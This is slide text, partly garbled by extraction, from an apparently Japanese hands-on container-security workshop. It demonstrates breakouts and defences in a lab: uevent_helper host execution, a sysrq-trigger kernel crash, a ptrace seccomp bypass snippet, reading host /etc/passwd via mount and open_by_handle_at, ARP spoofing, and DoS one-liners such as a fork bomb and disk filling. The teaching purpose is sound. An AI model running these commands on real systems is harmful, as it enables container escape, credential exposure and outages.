Slide 95

Slide 95 text

ΤϯδχΞ ৿ాߒฏ@mrtc0 ηΩϡϦςΟରࡦࣨ https://blog.ssrf.in/

Slide 96

Slide 96 text

४උ $ vagrant up $ vagrant ssh vagrant@ubuntu-xenial:~/$ cd files vagrant@ubuntu-xenial:~/files$ ls apparmor bypass_seccomp.c sample1.haco sample3.haco breakout.c read_passwd.c sample2.haco sample4.haco

Slide 97

Slide 97 text

ԋशʹ͍ͭͯ wԋश͸ίϐϖͰͰ͖ΔΑ͏ʹ؆୯ͳνʔτγʔτΛ༻ҙ͍ͯ͠·͢ •https://github.com/pepabo/kyusec-container •https://bit.ly/2OXu7qc wԋशίϚϯυʹ͍ͭͯ wԋश಺༰͕εϥΠυҰຕʹऩ·Βͳ͍ͷͰɺ࠷ॳʹԋशͷ಺༰ͷखॱΛ঺հ͠ ͨ͋ͱʹɺd෼΄Ͳ࣌ؒΛऔͬͯօ͞ΜʹԋशΛͯ͠΋Β͍·͢ wۙ͘ͷਓͱ࿩͠ͳ͕Β΍͍͍ͬͯͨͩͯߏ͍·ͤΜ

Slide 98

Slide 98 text

ίϚϯυͰͷૢ࡞ʹ͍ͭͯ wϗετ WBHSBOU ͱίϯςφΛߦ͖དྷ͠·͢ wλʔϛφϧΛෳ਺ىಈͯ͠ɺͦΕͧΕͰvagrant ssh͓ͯ͘͠ͱศརͰ͢ $ ↑ Host ͸ϗετͰͷૢ࡞Ͱ͢ Host $ ↑ Container ͸ίϯςφͰͷૢ࡞Ͱ͢ Container

Slide 99

Slide 99 text

)BDPOJXB • *.haco ͕ίϯςφͷઃఆΛهड़ͨ͠ϑΝΠϧͰ͢ $ sudo haconiwa start sample1.haco Create lock: # Container fork success and going to wait: pid=9816 root@sample1:/# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.3 18208 3324 pts/3 S 09:18 0:00 /bin/bash root 14 0.0 0.2 34424 2824 pts/3 R+ 09:19 0:00 ps aux Host

Slide 100

Slide 100 text

-9$ • attacker ͱ victim ͱ͍͏ίϯςφ͕͋Δ͜ͱΛ֬ೝ $ lxc list … attacker | RUNNING | 10.152.207.88 (eth0) victim | RUNNING | 10.152.207.51 (eth0) … Host

Slide 101

Slide 101 text

#SFBLPVU GSPN $POUBJOFS

Slide 102

Slide 102 text

#SFBLPVUGSPN$POUBJOFS wηΩϡϦςΟػߏʹΑΔ੍ݶΛճආ͢Δ͜ͱ w୤ग़ʹ#SFBLPVU +BJMCSFBL w$POUBJOFS㲗$POUBJOFS w$POUBJOFS㲗)PTU wίϯςφͷηΩϡϦςΟػߏʹઃఆෆඋ͕͋Δͱ#SFBLPVU͕Ͱ͖ͯ͠·͏

Slide 103

Slide 103 text

$POUBJOFS)PTUJOH wίϯςφҰͭҰͭΛϢʔβʔʹఏڙ w)FSPLV $JSDMF$* ϚωΫϥ FUDʜ w΋͠ίϯςφ͔ΒଞͷίϯςφʹΞΫ ηεͰ͖ͨΒʜʁ w΋͠ίϯςφ͔ΒϗετʹΞΫηεͰ ͖ͨΒʜʁ

Slide 104

Slide 104 text

$POUBJOFS4FDVSJUZ 04Ϧιʔεͷ෼཭ 1SPDFTT pMFTZTUFN FUDʜ wDISPPUQJWPU@SPPU w-JOVY/BNFTQBDF wTFDDPNQ w-JOVY$BQBCJMJUZ wDHSPVQT w4&-JOVY"QQ"SNPS ݖݶػೳͷ੍ݶ QFSNJTTJPO TZTDBMM 04Ϧιʔεͷ੍ݶ $16 .FNPSZ ΞΫηείϯτϩʔϧ ಛఆͷϑΝΠϧ΁ͷΞΫηεېࢭʣ

Slide 105

Slide 105 text

"QQ"SNPS

Slide 106

Slide 106 text

"QQ"SNPS wίϯςφ͸ϗετͱҰ෦ͷϑΝΠϧΛڞ༗͍ͯ͠Δ wಡΈॻ͖͕Ͱ͖ΔͱϗετʹӨڹΛٴ΅͢ϑΝΠϧ΋͋Δ wFY /proc/kcore /proc/sysrq-trigger w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSͰ੍ޚ͍ͯ͠Δ w΋͠ॻ͖ࠐΊͨ৔߹ʹͲͷΑ͏ͳ͜ͱ͕ى͜Δͷ͔͔֬ΊͯΈΑ͏ʂ

Slide 107

Slide 107 text

TZTLFSOFMVFWFOU@IFMQFS wuevent͸σόΠε͕௥Ճ࡟আ͞Εͨͱ͖ʹΧʔωϧ͕ૹ৴͢ΔΠϕϯτ wuevent͕ૹ৴͞Εͨͱ͖ʹɺuevent_helperʹॻ͖ࠐ·Ε͍ͯΔύεͷϓ ϩάϥϜΛ࣮ߦ͢Δ wuevent͸Ϣʔβʔϥϯυ͔Βૹ৴Մೳ •/sys/devices/virtual/mem/null/uevent •/sys/class/mem/null/uevent

Slide 108

Slide 108 text

-FU`T#SFBLPVU $ sudo haconiwa start sample1.haco root@sample:/# cat /root/hello.sh # ޷͖ͳΤσΟλͰॻ͖ࠐΉ #!/bin/sh echo “Hello, Host! ;)” > /tmp/hello.txt root@sample:/# chmod +x /root/hello.sh root@sample:/# echo “/var/lib/haconiwa/sample1/root/hello.sh” > /sys/kernel/uevent_helper Host Container

Slide 109

Slide 109 text

-FU`T#SFBLPVU $ ls /tmp/ root@sample:/# echo change > /sys/class/mem/null/uevent $ ls /tmp hello.txt $ cat /tmp/hello.txt hello host! ;) Host Container Host

Slide 110

Slide 110 text

QSPDTZTSRUSJHHFS root@sample1:/# echo c > /proc/sysrq-trigger Container w/proc/sysrq-triggerʹಛఆͷจࣈྻΛૹ৴͢Δ͜ͱͰϗετΛ࠶ىಈ͞ ͤͨΓΧʔωϧύχοΫΛىͨ͜͠ΓͰ͖Δ

Slide 111

Slide 111 text

"QQ"SNPS deny /usr/bin/top mrwklx, # top ίϚϯυͷಡΈॻ͖࣮ߦΛېࢭ wϓϩάϥϜ୯ҐͰϑΝΠϧ΍ιέοτ΁ͷڧ੍ΞΫηε੍ޚ ."$ Λߦ͏ wNSLXLMY͸ΞΫηεϞʔυΛද͠ɺS͸3FBE X͸XSJUF Y͸࣮ߦΛද͢ wIUUQNBOQBHFTVCVOUVDPNNBOQBHFTCJPOJDNBOBQQBSNPSE IUNM

Slide 112

Slide 112 text

"QQMZ"QQ"SNPS1SPpMFUP$POUBJOFS $ cat apparmor/haconiwa-test … deny /usr/bin/top mrwklx, deny @{PROC}/sysrq-trigger rwklx, … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏ Host

Slide 113

Slide 113 text

"QQMZ"QQ"SNPS1SPpMFUP$POUBJOFS $ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/ $ sudo apparmor_parser -Kr \ /etc/apparmor.d/haconiwa/haconiwa-test $ cat sample1.haco … config.apparmor = "haconiwa-test" … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏ Host

Slide 114

Slide 114 text

"QQMZ"QQ"SNPS1SPpMFUP$POUBJOFS $ haconiwa start sample1.haco Host root@sample1:/# top bash: /usr/bin/top: Permission denied root@sample1:/# echo c > /proc/sysrq-trigger bash: /proc/sysrq-trigger: Permission denied Container

Slide 115

Slide 115 text

"QQ"SNPS w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSʹΑͬͯίϯςφͰར༻Ͱ͖Δί Ϛϯυͷ࣮ߦ΍ϑΝΠϧ΁ͷಡΈॻ͖Λ੍ݶͰ͖Δ •/proc/sysrq-trigger •/proc/sys/kernel/core_pattern •/proc/sys/kernel/modprobe •/sys/kernel/uevent_helper

Slide 116

Slide 116 text

TFDDPNQ

Slide 117

Slide 117 text

TFDDPNQ-JOVY$BQBCJMJUZ wγεςϜίʔϧͷϑΟϧλϦϯάΛߦ͏࢓૊Έ wϗετଆʹΤεέʔϓΛڐͯ͠͠·͏Α͏ͳةݥͳγεςϜίʔϧΛ๷͙ root@sample1:/# mkdir /tmp/hoge Bad system call Container

Slide 118

Slide 118 text

2VJDL'VO&YBNQMF $ cat sample2.haco config.seccomp.filter(default: :allow) do |rule| rule.kill :mkdir # mkdir(2) Λېࢭ end $ sudo haconiwa start sample2.haco root@sample1:/# mkdir /tmp/hoge Bad system call Host

Slide 119

Slide 119 text

TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘

Slide 120

Slide 120 text

#ZQBTTTFDDPNQ wTFDDPNQϕʔεͷ4BOECPY؀ڥ͸Τεέʔϓ͢Δ͜ͱ͕Ͱ͖Δ wmkdir(2)͕ېࢭ͞Ε͍ͯͯ΋ճආͰ͖Δ wઈରʹptrace(2)ͷ࢖༻ΛڐՄͯ͠͸͍͚ͳ͍ʂ wτϨʔα͕ϓϩηεͷγεςϜίʔϧΛมߋͯ͠ϑΟϧλΛόΠύεͰ͖Δ wͨͩ͠-JOVY,FSOFMҎલͷόʔδϣϯͰ௨༻͢Δ

Slide 121

Slide 121 text

-FU`T#ZQBTT root@sample1:~/# ls bypass_seccomp.c root@sample1:~/# mkdir dir Bad system call root@sample1:~/# gcc bypass_seccomp.c root@sample1:~/# ./a.out root@sample1:~/# ls -al … drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir # ࡞੒Ͱ͖ͨ Container

Slide 122

Slide 122 text

NLEJS TFDDPNQ Bad system call

Slide 123

Slide 123 text

HFUQJE TFDDPNQ QUSBDF getpid(2) Λݺͼग़͢ঢ়ଶʢϨδελʣΛ mkdir(2) Λݺͼग़͢ঢ়ଶʹมߋ NLEJS

Slide 124

Slide 124 text

QUSBDF kill(getpid(), SIGSTOP); syscall(SYS_getpid, SYS_mkdir, "dir", 0777); if (regs.orig_rax == SYS_getpid) { regs.orig_rax = regs.rdi; regs.rdi = regs.rsi; regs.rsi = regs.rdx; regs.rdx = regs.r10; ptrace(PTRACE_SETREGS, pid, NULL, &regs); }

Slide 125

Slide 125 text

-JOVY$BQBCJMJUZ

Slide 126

Slide 126 text

wSPPUͷΈ͕࢖༻Ͱ͖ΔݖݶΛɺࡉ੍͔͘ޚͰ͖Δ࢓૊Έ wҰ෦͚ͩ෇༩ͨ͠Γ੍ݶͨ͠Γ DBQBCJMJUZ $"1@4:4@"%.*/ $"1@4:4@$)3005 $"1@4:4@153"$& $"1@/&5@3"8 $"1@4:4@#005 NPVOU ͳͲ DISPPU QUSBDF 3"8ιέοτ QJOHͳͲ SFCPPU ͱLFYFD@MPBE -JOVY$BQBCJMJUZ

Slide 127

Slide 127 text

&YQMPSJOH$BQBCJMJUJFT $ sudo haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms ^C --- 8.8.8.8 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms Host

Slide 128

Slide 128 text

2VJDL'VO&YBNQMF root@sample1:/# mount /dev/sda1 /mnt/ root@sample1:/# cat /mnt/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin … vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false Container

Slide 129

Slide 129 text

2VJDL'VO&YBNQMF $ cat sample3.haco … config.capabilities.allow :all config.capabilities.drop "cap_sys_admin" config.capabilities.drop "cap_net_raw" … Host

Slide 130

Slide 130 text

2VJDL'VO&YBNQMF $ sudo haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 ping: icmp open socket: Operation not permitted root@sample1:/# mount /dev/sda1 /mnt/ mount: permission denied Host

Slide 131

Slide 131 text

Slide 132

Slide 132 text

PQFO@CZ@IBOEMF@BU wϑΝΠϧϋϯυϧ͕ࢀর͢ΔϑΝΠϧΛ։͘γεςϜίʔϧ •CAP_DAC_READ_SEARCH wϑΝΠϧͱσΟϨΫτϦͷಡΈग़͠ͷݖݶνΣοΫΛόΠύε͢Δ wCJOENPVOUͨ͠σΟϨΫτϦͱಉ͡ϑΝΠϧγεςϜʹ͋Δ೚ҙͷϑΝΠϧ ʹΞΫηεՄೳ

Slide 133

Slide 133 text

PQFO@CZ@IBOEMF@BU int open_by_handle_at( int mount_fd, struct file_handle *handle, int flags); struct file_handle { unsigned int handle_bytes; /* Size of f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ };

Slide 134

Slide 134 text

PQFO@CZ@IBOEMF@BU struct file_handle { unsigned int handle_bytes; /* Size of f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ }; ઌ಄όΠτʹ͸։͖͍ͨϑΝΠϧͷJOPEF൪߸

Slide 135

Slide 135 text

PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8 IO Block: 4096 regular file Device: 801h/2049d Inode: 23125 Links: 1 Host struct my_file_handle h = { .handle_bytes = 8, .handle_type = 1, // 23125 = 5a 55 .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };

Slide 136

Slide 136 text

3FBEUPFUDQBTTXE $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8 IO Block: 4096 regular file Device: 801h/2049d Inode: 23125 Links: 1 $ sudo haconiwa start sample4.c root@sample1:/# vim read_passwd.c // Change ex) 23125 = 5a 55 .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} }; Host

Slide 137

Slide 137 text

3FBEUPFUDQBTTXE root@sample1:/# gcc read_passwd.c root@sample1:/# ./a.out root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin … vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false Container

Slide 138

Slide 138 text

%&.0 (FU4IFMM root@sample1:/# gcc get_shell.c root@sample1:/# ./a.out Container $ sudo haconiwa start demo1.haco Host

Slide 139

Slide 139 text

Container Network https://flic.kr/p/7dwxjt

Slide 140

Slide 140 text

#SJEHF/FUXPSL w-9%͸σϑΥϧτઃఆͰ͸ ϒϦοδ͕࡞੒͞ΕΔ eth0 lxdbr0 veth0 eth0 veth0 eth0 $POUBJOFS $POUBJOFS #SJEHF

Slide 141

Slide 141 text

#SJEHF/FUXPSL $ ip addr show dev lxdbr0 4: lxdbr0: mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff inet 10.152.207.1/24 scope global lxdbr0 valid_lft forever preferred_lft forever inet6 fd2e:8281:6de5:9841::1/64 scope global valid_lft forever preferred_lft forever inet6 fe80::281a:c0ff:fed1:4b28/64 scope link valid_lft forever preferred_lft forever Host

Slide 142

Slide 142 text

$POUBJOFS/FUXPSL wίϯςφΛϗεςΟϯά͍ͯ͠Δ ৔߹ɺΠϯλʔωοτ͔Βτϥ ϑΟοΫΛड͚Δ w΋͠ίϯςφ಺ͷϢʔβʔ͕τϥ ϑΟοΫΛ๣डͰ͖ͨΒʜʁ 4500 0088 7f79 4000 4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

Slide 143

Slide 143 text

"314QPPpOH w"31ͷੑ࣭Λར༻ͯ͠ϧʔςΟϯ άΛมߋ͢Δ w"31ςʔϒϧ ΞυϨεରরද Λ ৴͡ΔࣄͰ੒Γཱ͍ͬͯΔ wԠ౴Λِ૷͢Δ͜ͱʹΑΓޡͬͨ "31ςʔϒϧΛԚછͤ͞Δ͜ͱ͕ Ͱ͖Δ 4500 0088 7f79 4000 4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

Slide 144

Slide 144 text

BSQB vagrant@ubuntu-xenial:~$ lxc list attacker | RUNNING | 10.152.207.88 (eth0) victim | RUNNING | 10.152.207.51 (eth0) vagrant@ubuntu-xenial:~$ arp -a ? (10.152.207.88) at 00:16:3e:90:41:01 [ether] on lxdbr0 # attacker ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3 ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.152.207.51) at 00:16:3e:42:e8:63 [ether] on lxdbr0 # victim Host

Slide 145

Slide 145 text

QJOHWJDUJNDPOUBJOFS vagrant@ubuntu-xenial:~$ lxc exec attacker bash root@test1:~# ping 10.152.207.51 # victim ip PING 10.152.207.51 (10.152.207.51) 56(84) bytes of data. 64 bytes from 10.152.207.51: icmp_seq=1 ttl=64 time=0.070 ms ^C --- 10.152.207.51 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms Host

Slide 146

Slide 146 text

"314QPPpOH root@test1:~# arpspoof -t 10.152.207.51 10.152.207.1 &> /dev/null & [1] 1619 root@test1:~# arpspoof -t 10.152.207.1 10.152.207.51 &> /dev/null & [2] 1620 Container

Slide 147

Slide 147 text

1PJTPOJOH vagrant@ubuntu-xenial:~$ arp -a ? (10.152.207.88) at 00:16:3e:90:41:01 [ether] on lxdbr0 ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3 ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.152.207.51) at 00:16:3e:90:41:01 [ether] on lxdbr0 Host

Slide 148

Slide 148 text

DBQUVSFQBDLFU root@test1:~# tcpdump -i any -vv -w test.pcap vagrant@ubuntu-xenial:~/shared$ curl 10.152.207.51:12345 root@test2:~# nc -lvp 12345 Container Container Host

Slide 149

Slide 149 text

DBQUVSFQBDLFU $ lxc file pull test1/root/test.pcap ./ $ tcpdump -X tcp port 12345 -r test.pcap 0x0000: 4500 0087 a5ee 4000 4006 e11d 0a98 cf01 E.....@.@....... 0x0010: 0a98 cf33 d856 3039 52ff 55fd 5bc5 5f47 ...3.V09R.U.[._G 0x0020: 8018 00e5 b3de 0000 0101 080a 006d f010 .............m.. 0x0030: 006d f010 4745 5420 2f20 4854 5450 2f31 .m..GET./.HTTP/1 0x0040: 2e31 0d0a 486f 7374 3a20 3130 2e31 3532 .1..Host:.10.152 0x0050: 2e32 3037 2e35 313a 3132 3334 350d 0a55 .207.51:12345..U 0x0060: 7365 722d 4167 656e 743a 2063 7572 6c2f ser-Agent:.curl/ 0x0070: 372e 3437 2e30 0d0a 4163 6365 7074 3a20 7.47.0..Accept:. 0x0080: 2a2f 2a0d 0a0d 0a */*.... Host

Slide 150

Slide 150 text

ͦͷଞͷ"UUBDL4VSGBDF

Slide 151

Slide 151 text

ENFTHͷϦϯάόοϑΝಡΈग़͠ͱফڈ root@sample1:/# dmesg [ 311.470895] EXT4-fs (sda1): error count since last fsck: 28 [ 311.470928] EXT4-fs (sda1): initial error at time 1537860516: htree_dirblock_to_tree:986: inode 542086: block 1069691 [ 311.470944] EXT4-fs (sda1): last error at time 1537928843: htree_dirblock_to_tree:986: inode 278756: block 531449 … root@06399a7a8814:/# dmesg -C root@06399a7a8814:/# dmesg Container

Slide 152

Slide 152 text

OFHBUJWFEFOUSZͷେྔੜ੒ root@sample1:/# perl -e 'stat("/$_") for 1..100000000’ vagrant@ubuntu-xenial:~$ sudo slabtop Active / Total Objects (% used) : 4172542 / 4182249 (99.8%) Active / Total Slabs (% used) : 197606 / 197606 (100.0%) Active / Total Caches (% used) : 78 / 122 (63.9%) Active / Total Size (% used) : 790487.34K / 794654.96K (99.5%) Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME 4050564 4050564 100% 0.19K 192884 21 771536K dentry Container

Slide 153

Slide 153 text

'JMF%FTDSJQUPS w։͚ΔϑΝΠϧσΟεΫϦϓλͷ਺ʹ͸ ্ݶ͕͋ΓɺQSPDTZTGTpMFNBYͰ ֬ೝͰ͖Δɻ wίϯςφͷதͷϓϩηε͕͜ͷ஋ͷ਺ ͚ͩϑΝΠϧσΟεΫϦϓλΛ։͘ͱɺ VJEΛڞ༗͍ͯ͠Δ৔߹͸ϗετଆʹ΋ Өڹ͕ੜ͡Δɻ for(i=0; i=99198; i++) { sprintf(buf, “/tmp/%d", i); int fd = open(buf, O_CREAT); if( fd == -1 ){ printf("max fd %d\n”, i); break; } } for(;;);

Slide 154

Slide 154 text

GPSLCPNCQSPDFTT $ :(){ :|: & };: $ for i in {1..9999}; do sleep infinity & done • େྔͷϓϩηεΛੜ੒͢Δ͜ͱͰCPU΍ϝϞϦΛѹഭͤ͞ΔDoS Container Container

Slide 155

Slide 155 text

%JTL4QBDF $ fallocate -l 20g big_file • ίϯςφʹσΟεΫ༰ྔ੍ݶ͕ͳ͍৔߹͸େ͖ͳϑΝΠϧΛ࡞੒͢Δ͜ͱͰɺ ϗετͷσΟεΫ༰ྔΛѹഭͤ͞Δ͜ͱ͕Ͱ͖Δɻ $ dd if=/dev/zero of=tempfile bs=20GB count=10 Container Container

Slide 156

Slide 156 text

·ͱΊ https://flic.kr/p/9fJb3k

Slide 157

Slide 157 text

·ͱΊ w-JOVYίϯςφ͸ෳ਺ͷηΩϡϦςΟػߏʹΑͬͯकΒΕ͍ͯΔ wεΠενʔζϞσϧʢFYTFDDPNQ͕΍ΒΕͯ΋$BQBCJMJUZ͕͋Δʣ wઃఆʹෆඋ͕͋Δͱίϯςφ͔Βϗετɺଞͷίϯςφ΁ӨڹΛٴ΅͢ w-9$΍%PDLFSͳͲ͸σϑΥϧτͰ͜ΕΒͷ߈ܸΛ๷͙ઃఆΛࢪ͍ͯ͠Δ w΋͔ͨ͠͠Βෆඋ͕͋Δ͔΋Ͷ w$7&

Slide 158

Slide 158 text

ҰॹʹϖύϘΛकΖ͏ ࠷৽ͷ࠾༻৘ใΛνΣοΫˠ !QC@SFDSVJU